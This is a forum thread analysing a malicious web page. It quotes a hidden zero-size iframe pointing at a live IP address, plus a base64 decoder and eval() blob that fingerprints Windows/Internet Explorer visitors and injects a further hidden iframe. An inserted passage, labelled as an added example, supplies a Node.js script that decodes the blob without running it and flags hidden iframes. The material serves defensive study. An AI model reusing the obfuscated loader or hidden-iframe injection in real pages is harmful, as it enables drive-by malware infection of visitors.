Author
alex
Good Poster
Added: Nov 28, 2004 11:57 am
I once posted this link to the Uma thread:

http://funteens.hookersex.net/TeenFunsFullSet8/index.html (don't click it!)

Calahan told me it uses an exploit to do something.

I decided to have a closer look and tell you about it, so that everyone can understand what is going on.

Part 1:
Not very spectacular, simply a thumbnail gallery of Uma .... mmmmhhh Very Happy .... ehh what did I want to say? .... oh yeah right .... let's have a look at the code.

It contains HTML code and JavaScript. It is not well formatted (it contains two HTML elements), but IE and most other browsers usually don't care.

There is one special line saying

"<iframe frameborder=0 height=0 style="visibility:hidden" width=0 src="http://64.186.138.100/u/"></iframe>"

So what does it mean?

IFRAME (internal frame) is a special tag for IE. I don't know if Firefox/Opera can understand it already, but they probably will in the near future. Usually it opens another HTML page within the original one. The more interesting facts are the frameborder, height and width attributes. They say that the page is opened but not displayed. To really make sure you don't see it, the style is set to hidden.

The page to open is "http://64.186.138.100/u/". Unfortunately this server doesn't allow reverse DNS lookup, so I cannot tell at once which company it is.

Part 2:

So let's look at the site it wants to open:

Code:
<script language=javascript>
<!--

var b64, f64,d;

// a(s): replaces every zero byte in the decoded array with 1, so the decoded
// text never contains a NUL character (the return sits outside the loop)
function a(s)
{
  var i;

  for (i=0;i<s.length;i++)
     if (!s[i])
        s[i]=1;
  return s;
}

// u(d): turns an array of byte values into a string, decoding UTF-8
// sequences of one, two or three bytes
function u(d)
{
   var r=new Array;
   var i=0;

   while(i<d.length)
   {
        if (d[i]<128)
        {
            // single-byte (ASCII) character
            r[r.length]=String.fromCharCode(d[i]);
            i++;
        }
        else if( (d[i]>191) && (d[i]<224) )
        {
            // two-byte sequence
            r[r.length]=String.fromCharCode(((d[i]&31)<<6)|(d[i+1]&63));
            i+=2;
        }
        else{
            // three-byte sequence
            r[r.length]=String.fromCharCode(((d[i]&15)<<12)|((d[i+1]&63)<<6)|(d[i+2]&63));
            i+=3;
        }
    }
    return r.join("");
}

// t(t): plain base64 decoding; line breaks and '=' padding are stripped first,
// which is why the blob below can be wrapped over many lines
function t(t)
{
    var d=new Array;
    var i=0;

    t=t.replace(/\n|\r/g,"");
    t=t.replace(/=/g,"");

    while(i<t.length)
    {
        // four base64 characters give three bytes
        d[d.length]=(f64[t.charAt(i)]<<2)|(f64[t.charAt(i+1)]>>4);
        d[d.length]=(((f64[t.charAt(i+1)]&15)<<4)|(f64[t.charAt(i+2)]>>2));
        d[d.length]=(((f64[t.charAt(i+2)]&3)<<6)|(f64[t.charAt(i+3)]));
        i+=4;
    }

    // drop the bytes that only came from missing padding
    if (t.length%4==2)
        d=d.slice(0, d.length-2);

    if (t.length%4==3)
        d=d.slice(0,d.length-1);

    return d;
}

// b(s): builds the base64 lookup tables (b64: index -> character,
// f64: character -> index), then base64-decodes s and converts it to text
function b(s)
{
    var b64s='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';

    b64=[];
    f64=[];

    for(var i=0;i<b64s.length;i++)
    {
        b64[i]=b64s.charAt(i);
        f64[b64s.charAt(i)]=i;
    }
    return u(a(t(s)));
}
// the blob below is decoded with b() and the resulting text is run as script
eval(b("dmFyIGJpa2t5ID0gZG9jdW1lbnQuY29va2llOwogIGZ1bmN0aW9uIGdldEN
vb2tpZShuYW1lKSB7IC8vIHVzZTogZ2V0Q29va2llKCJuYW1lIik7CiAgICB2
YXIgaW5kZXggPSBiaWtreS5pbmRleE9mKG5hbWUgKyAiPSIpOwogICAga
WYgKGluZGV4ID09IC0xKSByZXR1cm4gbnVsbDsKICAgIGluZGV4ID0gYml
ra3kuaW5kZXhPZigiPSIsIGluZGV4KSArIDE7IAogICAgdmFyIGVuZHN0ciA9
IGJpa2t5LmluZGV4T2YoIjsiLCBpbmRleCk7IAogICAgaWYgKGVuZHN0ciA9
PSAtMSkgZW5kc3RyID0gYmlra3kubGVuZ3RoOwogICAgcmV0dXJuIHVuZX
NjYXBlKGJpa2t5LnN1YnN0cmluZyhpbmRleCwgZW5kc3RyKSk7CiAgfSAgIA
ogIHZhciB0b2RheSA9IG5ldyBEYXRlKCk7CiAgdmFyIGV4cGlyeSA9IG5ldyB
EYXRlKHRvZGF5LmdldFRpbWUoKSArIDI4ICogMjQgKiA2MCAqIDYwICogM
TAwMCk7IC8vIHBsdXMgMjggZGF5cwogIGZ1bmN0aW9uIHNldENvb2tpZSh
uYW1lLCB2YWx1ZSkgeyAvLyB1c2U6IHNldENvb2tpZSgibmFtZSIsIHZhbHVl
KTsKICAgIGlmICh2YWx1ZSAhPSBudWxsICYmIHZhbHVlICE9ICIiKQogIC
AgICBkb2N1bWVudC5jb29raWU9bmFtZSArICI9IiArIGVzY2FwZSh2YWx1Z
SkgKyAiOyBleHBpcmVzPSIgKyBleHBpcnkudG9HTVRTdHJpbmcoKTsKICAg
IGJpa2t5ID0gZG9jdW1lbnQuY29va2llOyAvLyB1cGRhdGUgYmlra3kKICB9C
nZhciBkZXRlY3QgPSBuYXZpZ2F0b3IudXNlckFnZW50LnRvTG93ZXJDYXNlK
Ck7CmZ1bmN0aW9uIGNoZWNrSXQoc3RyaW5nKQp7CiAgICAgICAgcGxh
Y2UgPSBkZXRlY3QuaW5kZXhPZihzdHJpbmcpICsgMTsKICAgICAgICB0aG
VzdHJpbmcgPSBzdHJpbmc7CiAgICAgICAgcmV0dXJuIHBsYWNlOwp9CiAgI
CAgICAgCiAgICAgICAgdmFyIGNuYW1lPSJEQmNDIjsKICAgICAgICBpZiAo
Z2V0Q29va2llKGNuYW1lKSA9PSBudWxsICYmIGNoZWNrSXQoJ3dpbicpIC
YmIGNoZWNrSXQoJ21zaWUnKSApCiAgICAgICAgewogICAgICAgICAgICA
gICAgLy8gZmVlZAogICAgICAgICAgICAgICAgZG9jdW1lbnQud3JpdGUoJz
xpZnJhbWUgc3JjPSJodHRwOi8vNjQuMTg2LjEzOC4xMDAvdS9iLmh0bWwiIH
dpZHRoPTAgaGVpZ2h0PTAgc3R5bGU9InZpc2liaWxpdHk6ZmFsc2UiPjwva
WZyYW1lPicpOwogICAgICAgICAgICAgICAgc2V0Q29va2llKGNuYW1lLCBN
YXRoLnJhbmRvbSgpKjY1MDAwKTsKICAgICAgICB9Cg=="))

-->
</script>


This means that the writer does not serve the HTML page directly but encodes it into an array of letters (something like base64 encoding; email uses the same). This is also a trick to get past virus scanners.

By changing the eval function into alert you can see what it means decoded.
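Added example (not from alex's post or from the captured page): a small Node.js script that does the decoding step described above without the alert trick, by extracting the eval(b("...")) argument and running it through a normal base64/UTF-8 decoder instead of executing it, then reporting what a defender looks for in such a capture: iframes with width=0, height=0, frameborder=0 or a hidden visibility style, and the gates in the decoded second stage. Decoding the blob quoted above gives a script that checks navigator.userAgent for 'win' and 'msie', uses a cookie named DBcC so the iframe is only written once per visitor, and document.write()s a hidden iframe pointing at http://64.186.138.100/u/b.html. The first-stage iframe tag below is the one quoted in the post; the second-stage blob is constructed here with a placeholder host to mirror that shape, because the real blob is too long to embed.

```javascript
// Static analysis of a captured drive-by page: decode the obfuscated payload
// with Buffer instead of eval, then report hidden iframes and browser/cookie
// gates. Added example, not code from the original thread or the captured page.

// Stage 1: the iframe line quoted in the post (taken verbatim from the thread).
const STAGE1_HTML =
  '<html><body><iframe frameborder=0 height=0 style="visibility:hidden" width=0 ' +
  'src="http://64.186.138.100/u/"></iframe></body></html>';

// Stage 2: a CONSTRUCTED stand-in for the eval(b("...")) blob. Same shape as the
// decoded script (user-agent check, once-only cookie, document.write of a hidden
// iframe), but EXAMPLE-HOST is a placeholder, not the real server.
const STAGE2_SOURCE = `
var detect = navigator.userAgent.toLowerCase();
var cname = "DBcC";
if (document.cookie.indexOf(cname + "=") == -1 && detect.indexOf('win') != -1 && detect.indexOf('msie') != -1) {
  document.write('<iframe src="http://EXAMPLE-HOST/u/b.html" width=0 height=0 style="visibility:false"></iframe>');
  document.cookie = cname + "=" + Math.random() * 65000;
}
`;
// Encode it and wrap the blob every 60 characters, as the forum wrapped the real one.
const STAGE2_SCRIPT = 'eval(b("' +
  Buffer.from(STAGE2_SOURCE, 'utf8').toString('base64').replace(/.{60}/g, '$&\n') +
  '"))';

// Pull every eval(b("...")) argument out of a captured script and decode it as
// base64 -> UTF-8 without executing anything. Whitespace inside the blob is
// removed first, mirroring the replace() calls in the captured decoder.
function decodeEvalPayloads(scriptText) {
  const re = /eval\(b\("([A-Za-z0-9+\/=\s]+)"\)\)/g;
  const decoded = [];
  let m;
  while ((m = re.exec(scriptText)) !== null) {
    const b64 = m[1].replace(/\s+/g, '');
    decoded.push(Buffer.from(b64, 'base64').toString('utf8'));
  }
  return decoded;
}

// Find iframes in markup and flag the attributes used to keep them invisible.
function findHiddenIframes(markup) {
  const results = [];
  const tagRe = /<iframe\b([^>]*)>/gi;
  let m;
  while ((m = tagRe.exec(markup)) !== null) {
    const attrs = m[1];
    const src = (attrs.match(/\bsrc\s*=\s*["']?([^"'\s>]+)/i) || [])[1] || null;
    const signals = [];
    if (/\bwidth\s*=\s*["']?0\b/i.test(attrs)) signals.push('width=0');
    if (/\bheight\s*=\s*["']?0\b/i.test(attrs)) signals.push('height=0');
    if (/\bframeborder\s*=\s*["']?0\b/i.test(attrs)) signals.push('frameborder=0');
    if (/visibility\s*:\s*(hidden|false)/i.test(attrs)) signals.push('visibility hidden');
    results.push({ src, hidden: signals.length > 0, signals });
  }
  return results;
}

// Describe the gates in a decoded stage: user-agent targeting, the cookie that
// makes it fire only once per victim, and any iframe it writes into the page.
function analyseDecodedStage(source) {
  const lower = source.toLowerCase();
  return {
    userAgentGate: /navigator\.useragent/.test(lower),
    targets: ['win', 'msie'].filter((t) => lower.includes("'" + t + "'")),
    cookieGate: /document\.cookie/.test(lower),
    writesIframe: /document\.write\s*\(\s*['"]<iframe/.test(lower),
    iframes: findHiddenIframes(source),
  };
}

// Full report for a two-stage capture: hidden iframes in the landing page plus
// an analysis of every decoded payload found in the second-stage script.
function analyseCapture(stage1Html, stage2Script) {
  return {
    stage1: findHiddenIframes(stage1Html),
    stage2: decodeEvalPayloads(stage2Script).map(analyseDecodedStage),
  };
}

console.log(JSON.stringify(analyseCapture(STAGE1_HTML, STAGE2_SCRIPT), null, 2));
```

Running it with `node` prints the report: the landing page's iframe is flagged with all four hiding signals and its src, and the decoded second stage is reported as gated on 'win' and 'msie', cookie-controlled, and writing a further hidden iframe. Nothing from the capture is executed; the decoder and the regular expressions only read text.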
alex
Good Poster
Added: Nov 28, 2004 12:09 pm
Ok, it tries to open another IFRAME. I tried to follow this link, but my virus scanner detected a virus. IE decided to stop working. And I don't have the time to do further research.
Calahan
Very Respected Poster
Added: Nov 28, 2004 2:22 pm
Very interesting, alex!
Thanks Very Happy

All the best,
Calahan
retro98
Poster
Added: Dec 24, 2004 8:39 pm
Thanks alex, but there is very little to do about it.
lewbowski7
I'm probably spamming
Added: Apr 20, 2005 12:15 am
Quite educational
Cruzing
Very Respected Poster
Added: Jun 27, 2005 2:35 pm
Shocked Shocked Shocked

My Mac. whois pulled up:

OrgName:    Global Innovations, Inc.
OrgID:      GLBI
Address:    4650 Wedgewood Blvd
Address:    Suite 107
City:       Frederick
StateProv:  MD
PostalCode: 21703
Country:    US

NetRange:   64.186.128.0 - 64.186.159.255
CIDR:       64.186.128.0/19
NetName:    GLOBALI
NetHandle:  NET-64-186-128-0-1
Parent:     NET-64-0-0-0-0
NetType:    Direct Allocation
NameServer: NS1.GLOBALI.NET
NameServer: NS2.GLOBALI.NET
Comment:    ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate:    2001-08-03
Updated:    2002-09-15

OrgAbuseHandle: GIAD-ARIN
OrgAbuseName:   Global Innovations Abuse Department
OrgAbusePhone:  +1-866-276-3638
OrgAbuseEmail:  abuse@globali.net

OrgNOCHandle: GIN1-ARIN
OrgNOCName:   Global Innovations NOC
OrgNOCPhone:  +1-866-276-3638
OrgNOCEmail:  noc@globali.net

OrgTechHandle: GIN1-ARIN
OrgTechName:   Global Innovations NOC
OrgTechPhone:  +1-866-276-3638
OrgTechEmail:  noc@globali.net

# ARIN WHOIS database, last updated 2005-06-26 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.

Gotta love them Macs
dark_angel
Respected Poster
Added: Jun 27, 2005 3:23 pm
Since I'm on Linux and don't fear IE bugs Very Happy I went for it and tried to load http://64.186.138.100/u/b.html
but it's no longer there:

Not Found
The requested URL /u/b.html was not found on this server.
Apache/2.0.50 (Unix) PHP/5.0.0 Server at 64.186.138.100 Port 80

DA
auser
Poster
Added: Jun 27, 2005 9:53 pm
Thanks for the info, not that I understand it all, but any and all tips are welcome. I find the Microsoft beta spyware works well, but the beta version expires next month; I don't know what that means, but I don't have as many problems as I used to.
Cruzing
Very Respected Poster
Added: Jun 28, 2005 2:45 am
I used to like Windows, until I bought a Mac. Very Happy Very Happy Very Happy Very Happy

I was forever fixing, troubleshooting, changing modem cards, adware, spyware, RAM partitions, all of it........
Windows will always be a more risky system for bad guys!
That will not change, ever!

Then I bought a Mac, everything always works, now I use it instead of fixing it!

Good Luck dude, not much more I can say.

Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool